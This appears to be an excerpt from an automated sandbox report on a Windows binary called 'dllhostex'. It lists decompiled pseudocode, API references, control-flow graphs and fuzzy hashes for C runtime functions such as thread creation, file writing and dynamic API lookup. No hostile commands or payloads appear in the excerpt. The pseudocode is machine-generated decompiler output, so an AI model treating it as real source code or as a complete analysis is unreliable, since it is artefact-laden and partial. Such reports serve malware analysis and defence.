                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02292f04857c2b85aa796aee7dde22092236649f672096e7fe8ef02e95934506
                                                • Instruction ID: a16b1edfa726961606552d275dd78cef44da0e659b6c413a8cbdefcfeb09454b
                                                • Opcode Fuzzy Hash: 02292f04857c2b85aa796aee7dde22092236649f672096e7fe8ef02e95934506
                                                • Instruction Fuzzy Hash: 3861A171E0410AAFEF59DBBCC842BEEBBBDEF1931CF008065F915A7159D67499008BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 176 1360efb-1360f06 177 1360f1c-1360f2f call 1360ea9 176->177 178 1360f08-1360f1a call 135eb5c call 135b7a1 176->178 184 1360f31-1360f4e CreateThread 177->184 185 1360f5d 177->185 192 1360f6a-1360f6d 178->192 187 1360f50-1360f5c GetLastError call 135eb26 184->187 188 1360f6e-1360f73 184->188 189 1360f5f-1360f69 call 1360e1b 185->189 187->185 190 1360f75-1360f78 188->190 191 1360f7a-1360f7e 188->191 189->192 190->191 191->189
                                                C-Code - Quality: 91%
                                                			E01360EFB(void* __ecx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, long _a20, void* _a24) {
                                                				signed int _v8;
                                                				long _v12;
                                                				void* _t14;
                                                				void* _t17;
                                                				void* _t29;
                                                				void* _t32;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				if(_a12 != 0) {
                                                					_t14 = E01360EA9(__ecx, __eflags, _a12, _a16);
                                                					_v8 = _t14;
                                                					__eflags = _t14;
                                                					if(_t14 == 0) {
                                                						L5:
                                                						_t32 = 0;
                                                						__eflags = 0;
                                                						L6:
                                                						E01360E1B( &_v8);
                                                						return _t32;
                                                					}
                                                					_t17 = CreateThread(_a4, _a8, E01360D9D, _t14, _a20,  &_v12); // executed
                                                					_t32 = _t17;
                                                					__eflags = _t32;
                                                					if(_t32 != 0) {
                                                						_t29 = _a24;
                                                						__eflags = _t29;
                                                						if(_t29 != 0) {
                                                							 *_t29 = _v12;
                                                						}
                                                						_v8 = _v8 & 0x00000000;
                                                						goto L6;
                                                					}
                                                					E0135EB26(GetLastError());
                                                					goto L5;
                                                				}
                                                				 *((intOrPtr*)(E0135EB5C())) = 0x16;
                                                				E0135B7A1();
                                                				return 0;
                                                			}

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000D0D9D,00000000,00000000,00000000), ref: 01360F44
                                                • GetLastError.KERNEL32(?,?,00000000,013521FC,00000000,?), ref: 01360F50
                                                • __dosmaperr.LIBCMT ref: 01360F57
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorLastThread__dosmaperr
                                                • String ID:
                                                • API String ID: 2744730728-0
                                                • Opcode ID: a4b8614e8a87ceec3af3f9f9c83d5fe6045c7b89dba6e7e1ec8265a221e649d7
                                                • Instruction ID: e5d4dbc25854aa25a7a1d179eac30f113a8a861141f2f438d54ae95106860d1b
                                                • Opcode Fuzzy Hash: a4b8614e8a87ceec3af3f9f9c83d5fe6045c7b89dba6e7e1ec8265a221e649d7
                                                • Instruction Fuzzy Hash: 6E01B53251421AEFDF299FE4DC06EAE7BACEF14319F008069FC0596154DB719914DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 197 1360345-136039a call 1354780 200 136040f-1360421 call 1353717 197->200 201 136039c 197->201 203 13603a2 201->203 205 13603a8-13603aa 203->205 206 13603c4-13603e9 WriteFile 205->206 207 13603ac-13603b1 205->207 208 1360407-136040d GetLastError 206->208 209 13603eb-13603f6 206->209 210 13603b3-13603b9 207->210 211 13603ba-13603c2 207->211 208->200 209->200 212 13603f8-1360403 209->212 210->211 211->205 211->206 212->203 213 1360405 212->213 213->200
                                                C-Code - Quality: 73%
                                                			E01360345(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				char _v9;
                                                				void _v5128;
                                                				long _v5132;
                                                				intOrPtr _v5136;
                                                				void* __esi;
                                                				signed int _t28;
                                                				int _t40;
                                                				long _t42;
                                                				char _t43;
                                                				intOrPtr* _t46;
                                                				intOrPtr* _t51;
                                                				intOrPtr _t55;
                                                				void* _t59;
                                                				void* _t61;
                                                				char* _t62;
                                                				long _t63;
                                                				signed int _t64;
                                                
                                                				E01354780();
                                                				_t28 =  *0x13cc074; // 0x4132269f
                                                				_v8 = _t28 ^ _t64;
                                                				_t48 = _a8;
                                                				_t46 = _a4;
                                                				_t51 = _a12;
                                                				_t55 = _a16 + _t51;
                                                				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0x13d5278 + (_a8 >> 6) * 4)) + 0x18 + (_t48 & 0x0000003f) * 0x30));
                                                				asm("stosd");
                                                				_v5136 = _t55;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				if(_t51 < _t55) {
                                                					_t59 = _v5132;
                                                					do {
                                                						_t62 =  &_v5128;
                                                						while(_t51 < _t55) {
                                                							_t43 =  *_t51;
                                                							_t51 = _t51 + 1;
                                                							if(_t43 == 0xa) {
                                                								 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 1;
                                                								 *_t62 = 0xd;
                                                								_t62 = _t62 + 1;
                                                							}
                                                							 *_t62 = _t43;
                                                							_t62 = _t62 + 1;
                                                							if(_t62 <  &_v9) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						_a12 = _t51;
                                                						_t63 = _t62 -  &_v5128;
                                                						_t40 = WriteFile(_t59,  &_v5128, _t63,  &_v5132, 0); // executed
                                                						if(_t40 == 0) {
                                                							 *_t46 = GetLastError();
                                                						} else {
                                                							_t42 = _v5132;
                                                							 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t42;
                                                							if(_t42 >= _t63) {
                                                								goto L9;
                                                							}
                                                						}
                                                						goto L12;
                                                						L9:
                                                						_t51 = _a12;
                                                						_t55 = _v5136;
                                                					} while (_t51 < _t55);
                                                				}
                                                				L12:
                                                				_pop(_t61);
                                                				return E01353717(_v8 ^ _t64, _t61);
                                                			}

                                                APIs
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,00000000,?,01360888,?,00000000,00000000,?,0000000D,00000000), ref: 013603E1
                                                • GetLastError.KERNEL32(?,01360888,?,00000000,00000000,?,0000000D,00000000,00000000,?,00000000,?,?,00000001,?,?), ref: 01360407
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID:
                                                • API String ID: 442123175-0
                                                • Opcode ID: b1e89f0685110b40c09681fda5efb1717585215dd862a1fe67148fd1123850cc
                                                • Instruction ID: 8b3c5e9fcb5557db37f86f694076d35af4e5dbeaee9aeac008e8ae59dbb5ac6b
                                                • Opcode Fuzzy Hash: b1e89f0685110b40c09681fda5efb1717585215dd862a1fe67148fd1123850cc
                                                • Instruction Fuzzy Hash: 5521D835A002199FCB2ACF29DD809D9B7BDEF4D305F1481A9EA06E7205D630DD42CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 214 1366fee-1367015 215 1367017-1367019 214->215 216 136701b-136701d 214->216 219 136706c-136706f 215->219 217 1367023-136702a call 1366f26 216->217 218 136701f-1367021 216->218 221 136702f-1367033 217->221 218->219 222 1367035-1367043 GetProcAddress 221->222 223 1367052-1367069 221->223 222->223 224 1367045-1367050 call 13537be 222->224 225 136706b 223->225 224->225 225->219
                                                C-Code - Quality: 85%
                                                			E01366FEE(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				struct HINSTANCE__* _t11;
                                                				_Unknown_base(*)()* _t14;
                                                				signed int* _t20;
                                                				signed int _t22;
                                                				signed int _t28;
                                                				signed int _t29;
                                                				signed int _t30;
                                                				signed int _t31;
                                                				_Unknown_base(*)()* _t36;
                                                
                                                				_t20 = 0x13d54d0 + _a4 * 4;
                                                				_t28 =  *0x13cc074; // 0x4132269f
                                                				_t31 = _t30 | 0xffffffff;
                                                				_t29 = _t28 ^  *_t20;
                                                				_t22 = _t28 & 0x0000001f;
                                                				asm("ror edx, cl");
                                                				if(_t29 != _t31) {
                                                					if(_t29 == 0) {
                                                						_t11 = E01366F26(_t22, _a12, _a16); // executed
                                                						if(_t11 == 0) {
                                                							L7:
                                                							_push(0x20);
                                                							asm("ror edi, cl");
                                                							 *_t20 = _t31 ^  *0x13cc074;
                                                							_t14 = 0;
                                                							L8:
                                                							return _t14;
                                                						}
                                                						_t36 = GetProcAddress(_t11, _a8);
                                                						if(_t36 == 0) {
                                                							goto L7;
                                                						}
                                                						 *_t20 = E013537BE(_t36);
                                                						_t14 = _t36;
                                                						goto L8;
                                                					}
                                                					return _t29;
                                                				}
                                                				return 0;
                                                			}













                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 49%
                                                			E01360D9D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				void* _t11;
                                                				signed int _t18;
                                                				void* _t23;
                                                				intOrPtr* _t30;
                                                				void* _t33;
                                                
                                                				_t23 = __ecx;
                                                				_t22 = __ebx;
                                                				_push(0x10);
                                                				_push(0x13c8258);
                                                				E01374290(__ebx, __edx, __edi, __esi);
                                                				_t30 =  *((intOrPtr*)(_t33 + 8));
                                                				if(_t30 == 0) {
                                                					ExitThread(GetLastError());
                                                				}
                                                				 *((intOrPtr*)(E01365D22(_t23, __edx) + 0x360)) = _t30;
                                                				_t11 = E01369F60(_t23); // executed
                                                				_t36 = _t11 - 2;
                                                				if(_t11 == 2) {
                                                					_t18 = E01367619(_t23, _t36, 1);
                                                					asm("sbb al, al");
                                                					 *((char*)(_t30 + 0x10)) =  ~_t18 + 1;
                                                				}
                                                				 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
                                                				 *0x13ae364( *((intOrPtr*)(_t30 + 4)));
                                                				E01360F80( *_t30,  *((intOrPtr*)( *_t30))());
                                                				 *((intOrPtr*)(_t33 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t33 - 0x14))))));
                                                				return E01362F4F(_t22,  *((intOrPtr*)(_t33 - 0x14)), _t30,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t33 - 0x14)))))),  *((intOrPtr*)(_t33 - 0x14)));
                                                			}









                                                APIs
                                                • GetLastError.KERNEL32(013C8258,00000010), ref: 01360DB0
                                                • ExitThread.KERNEL32 ref: 01360DB7
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorExitLastThread
                                                • String ID:
                                                • API String ID: 1611280651-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 54%
                                                			E01353728(void* __esi, void* __eflags, intOrPtr _a4) {
                                                				intOrPtr _v16;
                                                				char _v20;
                                                				intOrPtr _v28;
                                                				void* _t11;
                                                				void* _t12;
                                                				void* _t21;
                                                				void* _t22;
                                                				char* _t23;
                                                				void* _t27;
                                                				void* _t28;
                                                				void* _t30;
                                                
                                                				while(1) {
                                                					_push(_a4);
                                                					_t11 = E0135C9DA(_t21); // executed
                                                					_pop(_t22);
                                                					if(_t11 != 0) {
                                                						break;
                                                					}
                                                					_t12 = E01362EB9(_t22, __eflags, _a4);
                                                					_pop(_t21);
                                                					__eflags = _t12;
                                                					if(_t12 == 0) {
                                                						__eflags = _a4 - 0xffffffff;
                                                						if(_a4 != 0xffffffff) {
                                                							_push(_t27);
                                                							_t27 = _t30;
                                                							_t30 = _t30 - 0xc;
                                                							E013522B9( &_v20);
                                                							E013555D7( &_v20, 0x13c7c74);
                                                							asm("int3");
                                                						}
                                                						_push(_t27);
                                                						_t28 = _t30;
                                                						_t23 =  &_v20;
                                                						E01354203(_t23);
                                                						E013555D7( &_v20, 0x13c7dd4);
                                                						asm("int3");
                                                						_push(_t28);
                                                						_push(_t23);
                                                						_v28 = 0;
                                                						return E013656E2(_v16);
                                                					} else {
                                                						continue;
                                                					}
                                                					L10:
                                                				}
                                                				return _t11;
                                                				goto L10;
                                                			}















                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 01354232
                                                  • Part of subcall function 013555D7: RaiseException.KERNEL32(?,?,?,01354254,?,?,?,?,?,?,?,?,01354254,?,013C7DD4), ref: 01355637
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0135424F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID:
                                                • API String ID: 3476068407-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 59%
                                                			E01293370(signed int __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                				char _v8;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				intOrPtr _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int* _v52;
                                                				intOrPtr* _v56;
                                                				intOrPtr* _v60;
                                                				intOrPtr* _v64;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t71;
                                                				signed int _t76;
                                                				void* _t86;
                                                				signed int _t87;
                                                				signed int _t88;
                                                				signed int _t92;
                                                				signed int _t98;
                                                				signed int _t99;
                                                				intOrPtr _t103;
                                                				intOrPtr _t105;
                                                				signed int _t107;
                                                				void* _t108;
                                                				intOrPtr _t110;
                                                				signed int* _t112;
                                                				intOrPtr* _t113;
                                                				intOrPtr* _t117;
                                                				unsigned int _t120;
                                                				signed int _t126;
                                                				signed int _t131;
                                                				intOrPtr* _t132;
                                                				signed int _t133;
                                                				signed int _t136;
                                                				signed int _t138;
                                                				signed int _t139;
                                                				signed int _t144;
                                                				intOrPtr* _t145;
                                                				intOrPtr _t147;
                                                				signed int _t148;
                                                				intOrPtr* _t150;
                                                				void* _t153;
                                                				intOrPtr _t154;
                                                
                                                				_t116 = __ecx;
                                                				_push(0xffffffff);
                                                				_push(0x13aaca8);
                                                				_push( *[fs:0x0]);
                                                				_t154 = _t153 - 0x2c;
                                                				_push(_t133);
                                                				_t71 =  *0x13cc074; // 0x4132269f
                                                				_push(_t71 ^ _t151);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v20 = _t154;
                                                				_t112 = __ecx;
                                                				_t128 =  *__ecx;
                                                				_t76 =  *((intOrPtr*)(__ecx + 4)) - _t128 >> 3;
                                                				_t144 = _a4 - _t128 >> 3;
                                                				if(_t76 == 0x1fffffff) {
                                                					E01291300(__ecx, _t128);
                                                					goto L31;
                                                				} else {
                                                					_t6 = _t76 + 1; // 0x2
                                                					_t133 = _t6;
                                                					_v44 = _t133;
                                                					_t120 =  *((intOrPtr*)(__ecx + 8)) - _t128 >> 3;
                                                					_t131 = _t120 >> 1;
                                                					if(_t120 <= 0x1fffffff - _t131) {
                                                						_t86 = _t131 + _t120;
                                                						__eflags = _t86 - _t133;
                                                						_t87 =  <  ? _t133 : _t86;
                                                						_v28 = _t87;
                                                					} else {
                                                						_t87 = _t133;
                                                						_v28 = _t133;
                                                					}
                                                					_t116 = _t87 * 8;
                                                					if(_t87 <= 0x1fffffff) {
                                                						__eflags = _t116 - 0x1000;
                                                						if(__eflags < 0) {
                                                							__eflags = _t116;
                                                							if(__eflags == 0) {
                                                								_t133 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t116); // executed
                                                								_t107 = E01353728(_t144, __eflags); // executed
                                                								_t154 = _t154 + 4;
                                                								_t133 = _t107;
                                                							}
                                                							goto L12;
                                                						} else {
                                                							goto L7;
                                                						}
                                                					} else {
                                                						_t116 = _t116 | 0xffffffff;
                                                						L7:
                                                						_t108 = _t116 + 0x23;
                                                						_t128 = _t131 | 0xffffffff;
                                                						_t109 =  <=  ? _t131 | 0xffffffff : _t108;
                                                						_push( <=  ? _t131 | 0xffffffff : _t108);
                                                						_t110 = E01353728(_t144, _t108 - _t116);
                                                						_t154 = _t154 + 4;
                                                						if(_t110 == 0) {
                                                							L31:
                                                							E0135B7B1(_t112, _t116, _t128, _t133, __eflags);
                                                							E01292370(_a8, _v32);
                                                							E012923A0(_t112, _t133, _v36, _v28);
                                                							E013555D7(0, 0);
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							_t117 = _v64;
                                                							_push(_t112);
                                                							_t113 = _v60;
                                                							_push(_t144);
                                                							_t145 = _v56;
                                                							_push(_t133);
                                                							__eflags = _t117 - _t113;
                                                							if(_t117 != _t113) {
                                                								_t136 = _t145 - _t117;
                                                								__eflags = _t136;
                                                								do {
                                                									 *_t145 =  *_t117;
                                                									_t145 = _t145 + 8;
                                                									 *((intOrPtr*)(_t136 + _t117 + 4)) =  *((intOrPtr*)(_t117 + 4));
                                                									 *_t117 = 0;
                                                									 *((intOrPtr*)(_t117 + 4)) = 0;
                                                									_t117 = _t117 + 8;
                                                									__eflags = _t117 - _t113;
                                                								} while (_t117 != _t113);
                                                							}
                                                							return _t145;
                                                						} else {
                                                							_t13 = _t110 + 0x23; // 0x23
                                                							_t133 = _t13 & 0xffffffe0;
                                                							 *((intOrPtr*)(_t133 - 4)) = _t110;
                                                							L12:
                                                							_t121 = _a8;
                                                							_t88 = _t144 * 8;
                                                							_t147 = _a4;
                                                							_t132 = _t88 + _t133;
                                                							_v48 = _t88;
                                                							_v8 = 0;
                                                							_v32 = _t132 + 8;
                                                							 *_t132 =  *_t121;
                                                							 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t121 + 4));
                                                							 *_t121 = 0;
                                                							 *((intOrPtr*)(_t121 + 4)) = 0;
                                                							_t92 = _t112[1];
                                                							_v24 = _t133;
                                                							_v36 = _t133;
                                                							_a8 = _t132;
                                                							_v40 = _t92;
                                                							if(_t147 != _t92) {
                                                								_push(_t133);
                                                								_push(_t147);
                                                								_push( *_t112);
                                                								L32();
                                                								_push(_v32);
                                                								_push(_t112[1]);
                                                								_push(_t147);
                                                								L32();
                                                							} else {
                                                								_t150 = _v24;
                                                								_t139 =  *_t112;
                                                								_v60 = _t150;
                                                								_v56 = _t150;
                                                								_v52 = _t112;
                                                								_v8 = 1;
                                                								asm("o16 nop [eax+eax]");
                                                								while(_t139 != _t92) {
                                                									 *_t150 = 0;
                                                									_t103 =  *((intOrPtr*)(_t139 + 4));
                                                									 *((intOrPtr*)(_t150 + 4)) = _t103;
                                                									_t164 =  *_t139;
                                                									if( *_t139 != 0) {
                                                										_push(_t103 + 1);
                                                										_t105 = E0135378E(_t121, _t164);
                                                										_t38 = _t150 + 4; // 0x8b0c428d
                                                										_t121 =  *_t38 + 1;
                                                										 *_t150 = _t105;
                                                										E01355650(_t105,  *_t139,  *_t38 + 1);
                                                										_t154 = _t154 + 0x10;
                                                									}
                                                									_t92 = _v40;
                                                									_t150 = _t150 + 8;
                                                									_v56 = _t150;
                                                									_t139 = _t139 + 8;
                                                								}
                                                								_t133 = _v24;
                                                							}
                                                							_t148 =  *_t112;
                                                							__eflags = _t148;
                                                							if(_t148 == 0) {
                                                								L29:
                                                								 *_t112 = _t133;
                                                								_t112[1] = _t133 + _v44 * 8;
                                                								_t112[2] = _t133 + _v28 * 8;
                                                								_t98 =  *_t112 + _v48;
                                                								__eflags = _t98;
                                                								 *[fs:0x0] = _v16;
                                                								return _t98;
                                                							} else {
                                                								_t99 = _t112[1];
                                                								__eflags = _t148 - _t99;
                                                								if(_t148 != _t99) {
                                                									_t138 = _t99;
                                                									do {
                                                										L01353789( *_t148);
                                                										_t148 = _t148 + 8;
                                                										_t154 = _t154 + 4;
                                                										__eflags = _t148 - _t138;
                                                									} while (_t148 != _t138);
                                                									_t148 =  *_t112;
                                                									_t133 = _v24;
                                                								}
                                                								_t126 = _t112[2] - _t148 & 0xfffffff8;
                                                								__eflags = _t126 - 0x1000;
                                                								if(_t126 < 0x1000) {
                                                									L28:
                                                									_push(_t126);
                                                									E01353758(_t148);
                                                									goto L29;
                                                								} else {
                                                									_t47 = _t148 - 4; // 0x1674f93b
                                                									_t128 =  *_t47;
                                                									_t116 = _t126 + 0x23;
                                                									_t144 = _t148 - _t128;
                                                									_t48 = _t144 - 4; // 0x1292e94
                                                									__eflags = _t48 - 0x1f;
                                                									if(__eflags > 0) {
                                                										goto L31;
                                                									} else {
                                                										_t148 = _t128;
                                                										goto L28;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}


                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0129359B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw
                                                • String ID:
                                                • API String ID: 2005118841-0
                                                • Opcode ID: 0c13ca3e2e298fca6c397930d68e3014d8754e2de9fa0e08dc826cdaccba2140
                                                • Instruction ID: 2b058c517116321fb30bbc6385a06eb84207ed6a8dbf8d3cbd445f578e51e363
                                                • Opcode Fuzzy Hash: 0c13ca3e2e298fca6c397930d68e3014d8754e2de9fa0e08dc826cdaccba2140
                                                • Instruction Fuzzy Hash: AD718DB6D101069FDF15CF6CC880AADBBF5FF48310F198269E919AB390E771A941CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 324 13669ee-1366a07 call 13669b3 call 1369cad 329 1366a10-1366a1f call 135b8fa 324->329 330 1366a09-1366a0b 324->330 334 1366a21-1366a26 329->334 335 1366a28-1366a31 call 135b8fa 329->335 331 1366aa0-1366aa2 330->331 337 1366a38-1366a48 334->337 339 1366a9c 335->339 341 1366a33 335->341 337->339 340 1366a4a-1366a56 337->340 344 1366a9e-1366a9f 339->344 342 1366a85-1366a9a 340->342 343 1366a58-1366a5d call 136571c 340->343 341->337 346 1366a81-1366a83 342->346 347 1366a62-1366a71 call 13656e2 343->347 344->331 346->344 347->342 350 1366a73-1366a7e 347->350 350->346
                                                C-Code - Quality: 97%
                                                			E013669EE(void* __eflags, intOrPtr* _a4) {
                                                				void* _t14;
                                                				void* _t16;
                                                				intOrPtr _t19;
                                                				intOrPtr _t21;
                                                				intOrPtr _t25;
                                                				intOrPtr _t34;
                                                				intOrPtr* _t37;
                                                				intOrPtr* _t38;
                                                
                                                				_t38 = _a4;
                                                				if(E01369CAD(E013669B3(_t38)) != 0) {
                                                					_t14 = E0135B8FA(1);
                                                					_t25 = 2;
                                                					if(_t38 != _t14) {
                                                						if(_t38 != E0135B8FA(_t25)) {
                                                							L12:
                                                							_t16 = 0;
                                                							L13:
                                                							return _t16;
                                                						}
                                                						_t37 = 0x13d5270;
                                                						L6:
                                                						 *0x13d4f88 =  *0x13d4f88 + 1;
                                                						_t2 = _t38 + 0xc; // 0xc
                                                						_t31 = _t2;
                                                						if(( *_t2 & 0x000004c0) != 0) {
                                                							goto L12;
                                                						}
                                                						asm("lock or [ecx], eax");
                                                						_t19 =  *_t37;
                                                						if(_t19 != 0) {
                                                							L11:
                                                							 *((intOrPtr*)(_t38 + 4)) = _t19;
                                                							 *_t38 =  *_t37;
                                                							 *((intOrPtr*)(_t38 + 8)) = 0x1000;
                                                							 *((intOrPtr*)(_t38 + 0x18)) = 0x1000;
                                                							L10:
                                                							_t16 = 1;
                                                							goto L13;
                                                						}
                                                						_t21 = E0136571C(_t31, 0x1000); // executed
                                                						 *_t37 = _t21;
                                                						E013656E2(0);
                                                						_t19 =  *_t37;
                                                						if(_t19 != 0) {
                                                							goto L11;
                                                						}
                                                						_t5 = _t38 + 0x14; // 0x14
                                                						_t34 = _t5;
                                                						 *((intOrPtr*)(_t38 + 8)) = _t25;
                                                						 *((intOrPtr*)(_t38 + 4)) = _t34;
                                                						 *_t38 = _t34;
